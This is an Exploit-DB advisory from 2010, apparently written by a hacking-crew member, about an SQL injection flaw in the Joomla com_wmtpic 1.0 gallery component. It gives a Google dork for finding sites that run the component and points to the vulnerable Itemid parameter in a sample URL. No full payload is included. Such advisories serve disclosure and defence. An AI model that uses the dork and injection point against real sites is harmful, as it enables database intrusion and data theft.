Joomla! Component com_wmtpic 1.0 - SQL Injection

EDB-ID:

14128

CVE:

2010-4968

EDB Verified:

Author:

RoAd_KiLlEr

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-06-30

Vulnerable App:

1                ###########################################           1
0                I'm **RoAd_KiLlEr**  member from Inj3ct0r Team        1
1                ###########################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+]Title     : Joomla  Component  com_wmtpic  SQL Injection Vulnerability
[+]Author    : **RoAd_KiLlEr**
[+]Contact   : RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on : Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws 
[~] Home: http://a-h-crew.net    
[~] Vendor: http://www.webmaster-tips.net
[~] Download App:http://www.webmaster-tips.net/Download/View-details/9-Joomla-Components/183-Joomla-1.5-Flash-Gallery-wmtPic.html
==========ExPl0iT3d by **RoAd_KiLlEr**==========

[+]Description:
Flash based image gallery for Joomla. Joomla component wmtPic, with thumbnail support, caption and multiple file upload option. Although it is not a must, it is better to put a link back to this site "Joomla component by Webmaster-tips.net " on your website if you can. This Joomla 1.5 Component is licensed under the GPLv2.0.

=========================================

[+] Dork: inurl:"com_wmtpic"

==========================================


[+].  SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+

[Exploit]:  http://127.0.0.1/path/index.php?option=com_wmtpic&Itemid=[] <== SQL-i

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services